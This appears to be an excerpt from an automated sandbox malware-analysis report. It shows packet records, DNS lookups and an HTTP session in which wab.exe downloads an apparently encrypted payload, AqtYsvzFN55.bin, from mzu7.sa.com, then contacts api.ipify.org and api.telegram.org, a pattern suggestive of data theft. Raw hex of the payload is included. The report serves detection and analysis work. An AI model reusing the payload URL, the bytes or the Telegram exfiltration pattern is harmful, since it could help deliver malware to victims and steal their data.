                                                                Mar 15, 2024 12:36:26.495693922 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:26.495764017 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.505435944 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.505449057 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:26.834146023 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:26.834222078 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.920224905 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.920238018 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:26.920514107 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:26.920576096 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.923532009 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:26.964282990 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.143302917 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.143328905 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.143416882 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.143429995 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.143477917 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.299787998 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.299880981 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.300225019 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.300457954 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.300605059 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.300681114 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.345750093 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.345817089 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.456708908 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.456779003 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.456990957 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.457057953 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.457432032 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.457493067 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.457787037 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.457848072 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.458276033 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.458332062 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.501872063 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.501962900 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.502031088 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.502087116 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.613563061 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.613645077 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.613997936 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.614064932 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.615490913 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.615557909 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.616022110 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.616085052 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.616353035 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.616414070 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.616765022 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.616832018 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.617320061 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.617377043 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.617697954 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.617760897 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.618032932 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.618099928 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.618475914 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.618536949 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.658799887 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.658863068 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.659190893 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.659251928 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.659575939 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.659642935 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.769952059 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.770047903 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.770334005 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.770405054 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.770756006 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.770814896 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.771109104 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.771177053 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.771502972 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.771562099 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.771899939 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.771965981 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.772011995 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.772061110 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.772067070 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.772083044 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.772130013 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.784404993 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.784420967 CET44349714162.240.109.7192.168.2.5
                                                                Mar 15, 2024 12:36:27.784431934 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:27.784552097 CET49714443192.168.2.5162.240.109.7
                                                                Mar 15, 2024 12:36:28.293024063 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.293102980 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:28.293209076 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.295491934 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.295528889 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:28.796735048 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:28.796920061 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.799242020 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.799254894 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:28.799668074 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:28.803220034 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:28.844276905 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:30.629475117 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:30.629620075 CET44349715104.26.13.205192.168.2.5
                                                                Mar 15, 2024 12:36:30.629712105 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:30.981293917 CET49715443192.168.2.5104.26.13.205
                                                                Mar 15, 2024 12:36:33.438747883 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.438819885 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:33.438926935 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.439382076 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.439414024 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:33.786663055 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:33.786760092 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.788914919 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.788944006 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:33.789351940 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:33.790666103 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:33.832240105 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.108104944 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.108402967 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.108433962 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.451260090 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.451358080 CET44349716149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.451509953 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.451757908 CET49716443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.608659029 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.608705044 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.608784914 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.609179974 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.609194040 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.950700998 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:34.954467058 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:34.954482079 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.281440020 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.281693935 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:35.281716108 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.527699947 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.528126001 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.528162003 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:35.528177023 CET44349717149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:36:35.528311014 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:36:35.528424978 CET49717443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.749665022 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.749751091 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:37:59.749851942 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.750463009 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.750487089 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:37:59.948385954 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.948421955 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:37:59.948522091 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.948935986 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:37:59.948949099 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.083672047 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.098388910 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.098469973 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.297630072 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.299468040 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.299494028 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.410876989 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.413317919 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.413372993 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.416665077 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.416699886 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.420587063 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.420619011 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.625791073 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.632539034 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.632567883 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.638566017 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.638581038 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:00.642556906 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:00.642575026 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:01.039092064 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:01.039180040 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:01.039191961 CET44349720149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:01.039263964 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:01.039721012 CET49720443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:01.282516003 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:01.282593966 CET44349721149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:01.282695055 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:01.282726049 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:01.283587933 CET49721443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:03.773988008 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:03.774039030 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:03.774113894 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:03.774365902 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:03.774384975 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:04.109847069 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:04.112940073 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:04.113025904 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:04.440108061 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:04.513711929 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:05.257780075 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:05.257833958 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:05.258002996 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:05.258030891 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:05.258119106 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:05.258147001 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:05.954960108 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:05.955041885 CET44349722149.154.167.220192.168.2.5
                                                                Mar 15, 2024 12:38:05.955041885 CET49722443192.168.2.5149.154.167.220
                                                                Mar 15, 2024 12:38:05.955092907 CET49722443192.168.2.5149.154.167.220
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 15, 2024 12:36:26.378416061 CET5234253192.168.2.51.1.1.1
                                                                Mar 15, 2024 12:36:26.485752106 CET53523421.1.1.1192.168.2.5
                                                                Mar 15, 2024 12:36:28.199744940 CET5650453192.168.2.51.1.1.1
                                                                Mar 15, 2024 12:36:28.287472010 CET53565041.1.1.1192.168.2.5
                                                                Mar 15, 2024 12:36:33.349852085 CET4953153192.168.2.51.1.1.1
                                                                Mar 15, 2024 12:36:33.437979937 CET53495311.1.1.1192.168.2.5
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 15, 2024 12:36:26.378416061 CET192.168.2.51.1.1.10xb60dStandard query (0)mzu7.sa.comA (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:28.199744940 CET192.168.2.51.1.1.10xf476Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:33.349852085 CET192.168.2.51.1.1.10x9950Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 15, 2024 12:36:26.485752106 CET1.1.1.1192.168.2.50xb60dNo error (0)mzu7.sa.com162.240.109.7A (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:28.287472010 CET1.1.1.1192.168.2.50xf476No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:28.287472010 CET1.1.1.1192.168.2.50xf476No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:28.287472010 CET1.1.1.1192.168.2.50xf476No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                Mar 15, 2024 12:36:33.437979937 CET1.1.1.1192.168.2.50x9950No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                • mzu7.sa.com
                                                                • api.ipify.org
                                                                • api.telegram.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549714162.240.109.74434400C:\Program Files (x86)\Windows Mail\wab.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-03-15 11:36:26 UTC171OUTGET /AqtYsvzFN55.bin HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: mzu7.sa.com
                                                                Cache-Control: no-cache
                                                                2024-03-15 11:36:27 UTC249INHTTP/1.1 200 OK
                                                                Date: Fri, 15 Mar 2024 11:36:27 GMT
                                                                Server: Apache
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Last-Modified: Fri, 15 Mar 2024 06:11:39 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 249920
                                                                Content-Type: application/octet-stream
                                                                2024-03-15 11:36:27 UTC7943INData Raw: 09 90 9d 47 80 a0 e1 8c 47 ef 93 2e 00 81 bf c9 26 c2 97 ca 77 f2 85 de 59 c5 fa f5 99 6c ef 39 ad ea ec a1 ec 7d 51 ca d0 97 0a 5a 5d 58 60 98 c6 01 ce 85 a3 04 e8 25 f7 36 dd 61 a3 5a 58 39 4f b3 f9 89 9a d2 6a b0 42 97 84 b2 2e 3d 12 50 25 de eb 1d 88 12 bd da 92 82 b6 db d6 5d 79 c7 f5 52 2e 2c a9 18 32 38 87 97 75 c7 91 33 c3 de 0b 11 77 15 18 5c 95 41 33 ac b4 31 8c a3 70 d4 72 f1 5f b7 3a 7a 6e 8e 4f aa fc 80 27 9c f1 4a d3 59 c2 d7 a2 61 bd f9 5e bc ae de 3c f2 80 28 12 88 e1 b3 5f 33 c3 cd f2 61 65 e2 4d 06 59 0a 3e 05 fe 8c e2 a5 2d 3b 9e fa b6 29 e0 02 33 2d 7d e5 6b 6a 18 87 15 40 c4 95 59 6a aa 07 94 c3 b3 0c b1 7e 62 eb 57 47 f3 76 a4 79 30 a6 85 7e 92 9a cf 98 d1 ab fb fc f4 b2 19 8c 30 fd e4 d5 13 25 c0 a6 28 26 2c 18 ac a3 ff 55 9a 77 2a
                                                                Data Ascii: GG.&wYl9}QZ]X`%6aZX9OjB.=P%]yR.,28u3w\A31pr_:znO'JYa^<(_3aeMY>-;)3-}kj@Yj~bWGvy0~0%(&,Uw*
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 6e bc 68 ed f2 e1 a9 4f 16 ae 1c b7 72 95 54 05 f4 43 5c f0 2c d0 b0 a2 de 27 0d 6e 15 3d 84 6e 51 99 a3 5b 91 48 e1 ba f1 20 47 b7 2a c0 b4 8e 3e 57 d6 5c 86 11 64 1c a7 2c 68 7f c8 6b 49 ef 25 fb a2 30 19 54 2f 59 0f d5 76 65 d4 9b d4 3b f9 07 18 2a 4f 64 00 5d 5c f6 4f 33 16 4d 77 e1 77 47 d7 7b f6 07 48 c8 02 90 0e fe b8 5a 0c 83 08 4d 6d 53 7f 29 9f af c5 43 c9 9b da 82 ae 7d 60 7b 47 08 49 88 dd 7d 45 17 2c 28 6f 4f c6 4a 5a 2a cb 7d 6b 2c 60 8d 79 e0 23 1c b3 ce 5e f1 5f 45 64 c3 35 b7 92 34 f3 4f bc 46 02 78 91 48 4c 2d da 3e 11 42 fb 6e 61 1c 5c 2c 19 04 29 90 9c f6 dd b1 8d f9 fa b7 82 62 5c 39 cb c8 c8 e3 ac 4c d8 37 74 55 6a 8d b8 74 f3 4a 90 69 18 5e 41 47 41 0d 95 9f ef c5 ce c8 16 1b 59 2a 6d 5c c7 8d 1b 62 65 fc 36 e0 84 f3 a2 ac c4 8d 81
                                                                Data Ascii: nhOrTC\,'n=nQ[H G*>W\d,hkI%0T/Yve;*Od]\O3MwwG{HZMmS)C}`{GI}E,(oOJZ*}k,`y#^_Ed54OFxHL->Bna\,)b\9L7tUjtJi^AGAY*m\be6
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 83 86 98 9e ed 8b 50 73 12 86 44 ee b9 de 86 cd 7f 18 68 cc 0c 50 c5 b9 90 12 ff aa 9a ff f9 67 2b 52 81 ec 12 69 6b 90 72 fe d0 eb ab 2f 19 3b 82 91 3c f3 01 54 26 1c af 68 1e a0 ad 6e cf 2c 8d 71 21 1c a0 de 9a ee fa 9a ec cc 68 86 35 b1 f8 14 6f 01 4e d2 0e c8 c1 9b cb 77 76 2d 50 f9 cf 88 ac 41 75 d1 33 6d e2 80 fd dd f1 8a 15 0e 60 e1 92 13 c1 21 23 d3 64 72 cd 4e e3 bc 31 e7 c1 9f c1 45 5e ff f5 81 5a 25 2a f2 f5 19 ee d3 88 b5 30 bc cf aa 45 31 e0 db 4b 08 76 db 0e cb bb b4 62 d6 eb 51 3d d4 eb 3b d7 46 f4 2d c7 e3 37 2d 63 b0 62 53 7d 85 8b d3 49 44 ea 0d 72 47 5a a2 92 d1 3d f4 f9 96 68 6d 7a 09 c5 70 49 35 bb 85 8c 0d 49 a7 4e 56 5c b8 7b cf c7 e2 fe e3 88 f0 b3 ce 72 02 0a 4b 5b 9c 58 07 f3 c9 14 74 27 7a 6b e9 f8 79 76 01 ef 5b 23 d7 61 cc 76
                                                                Data Ascii: PsDhPg+Rikr/;<T&hn,q!h5oNwv-PAu3m`!#drN1E^Z%*0E1KvbQ=;F-7-cbS}IDrGZ=hmzpI5INV\{rK[Xt'zkyv[#av
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 2d ea 1a af 44 a0 23 dc e2 75 46 f9 fd 6e 12 94 42 07 82 71 f6 1e 38 32 5f bd bd 7d b5 68 37 fa b5 31 9b 81 b1 5f f1 58 f4 e7 fd ef d2 3d 25 99 df 52 04 11 14 46 7f 3a 6e 11 bd a8 56 d2 89 52 9b b0 1e 24 46 88 7f 24 76 a6 50 3a d8 5d 0a 5f 9d 7c 7d a7 69 6b f0 f9 b9 de b0 6e a9 1d 29 f8 58 cf 75 65 52 e8 b9 96 20 f5 19 65 9d da 61 30 db ff 5c 31 18 84 60 c0 8c e2 7a 14 53 30 f5 fd 86 69 47 5b 1b 6e 63 a7 be 44 25 ce e3 fa 33 50 86 19 d7 cf cd 26 33 7c c0 67 02 ff cc be 28 1c 61 aa 4c 18 11 01 41 4b 8b 6e 03 9b 25 b4 39 3b e9 90 06 fd e6 61 22 25 44 90 78 41 34 c5 84 4c 46 21 25 0a 90 25 4d e4 1d 79 2d fe 21 21 5e ca 76 2c 67 16 59 7b 7c 39 71 fb f8 7c 3d 73 db a6 08 8f 1c c3 25 70 76 e0 e6 f3 5c 92 65 42 08 1c 45 50 f8 6e da 7b e8 50 2d d1 e0 22 b8 7d 0c
                                                                Data Ascii: -D#uFnBq82_}h71_X=%RF:nVR$F$vP:]_|}ikn)XueR ea0\1`zS0iG[ncD%3P&3|g(aLAKn%9;a"%DxA4LF!%%My-!!^v,gY{|9q|=s%pv\eBEPn{P-"}
                                                                2024-03-15 11:36:27 UTC8000INData Raw: 94 41 35 95 c3 30 0c a3 8e d8 78 ee cd 15 3a ce 6d 2c dc 12 fd c6 85 10 a5 22 b0 02 b8 a6 d0 08 24 85 39 d1 ae bd 5d 9c ee b9 68 af 83 ee 4a 40 b6 a3 2c 04 0e c2 f7 45 0d 2a 21 47 95 e9 bc c7 bd 30 ba fc c4 16 ef 02 43 05 9e a0 6b 60 6d 80 17 40 a2 b9 8c 0a aa f9 98 c4 b3 7e e0 71 82 9b 3a db f9 77 a9 87 3e 68 86 80 9e 97 cf 66 dd ac fb 8e 71 58 1a fc 5f 40 e5 d5 15 db ca af 28 d8 60 1d ac 7d f3 52 9a 07 4f ca aa 1e 2f 27 7d 14 fa 76 87 8b a7 c2 cb 0e da 0d f5 1b fa 02 21 9a 62 00 ed d8 08 70 20 5d 9d 1f 87 a0 1c 48 4a 6c e3 d0 b7 f8 f9 7f 1a db 0e b7 61 28 96 f1 43 79 10 45 56 c3 6e 8d d2 0d 2d 2a 75 8a 06 95 22 c5 f3 75 96 f1 ae 08 f5 e6 38 7b e8 ee 2e 80 65 ef 33 38 24 de 20 99 aa 2c dd 53 a7 48 1b 44 77 ae 0a e4 6a 98 5f d7 3f 38 08 57 57 b7 4a a7 71
                                                                Data Ascii: A50x:m,"$9]hJ@,E*!G0Ck`m@~q:w>hfqX_@(`}RO/'}v!bp ]HJla(CyEVn-*u"u8{.e38$ ,SHDwj_?8WWJq
                                                                2024-03-15 11:36:27 UTC8000INData Raw: a7 4c 5d f8 66 67 43 f1 96 91 10 59 0c f3 08 2d 90 10 c1 cb b1 fd 68 1b b4 82 48 3a d7 cb c8 3c 8d e7 55 d8 31 8a a7 63 8c 46 58 f0 4a e2 62 25 67 31 28 a6 af b5 9f 80 2b ce 36 12 e6 55 2e 93 22 fd 98 3b 13 0a 11 36 1e 8f a5 5b ac c4 87 89 28 fd 43 93 73 21 da 27 aa 10 6e 89 26 f4 cf 03 c6 8e 2f e4 03 bd e4 a2 8c cd 6c 40 6f 31 fa b7 cf f4 14 bb 5c a7 c9 6a 77 31 6c 35 26 5b 5f 44 20 96 81 bf 28 b0 17 b5 45 b8 ba 31 24 f3 e4 a4 75 7f 90 a9 74 99 bb 93 c6 36 2c bf 0d 90 71 9f 49 06 37 0b 26 ba 10 0d 9c 4d 4d ce e5 2e 91 9d ed 55 2d 0a 92 c3 88 d7 6d 2d 31 10 77 d6 07 99 c9 43 72 1d 78 fc 78 02 8b 41 d0 3e 0b 3e 18 50 48 0f 29 ff 05 8d 38 18 09 e5 f3 62 9c 7c 28 9f d5 46 b3 28 3d 39 57 cd 53 33 0b 2f 7e 53 87 95 1f d3 3b 92 46 9d 8e af d2 97 a4 45 11 c6 9a
                                                                Data Ascii: L]fgCY-hH:<U1cFXJb%g1(+6U.";6[(Cs!'n&/l@o1\jw1l5&[_D (E1$ut6,qI7&MM.U-m-1wCrxxA>>PH)8b|(F(=9WS3/~S;FE
